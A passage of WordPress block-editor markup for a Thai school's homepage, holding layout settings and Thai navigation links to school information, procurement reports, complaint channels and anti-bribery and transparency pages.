,\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} 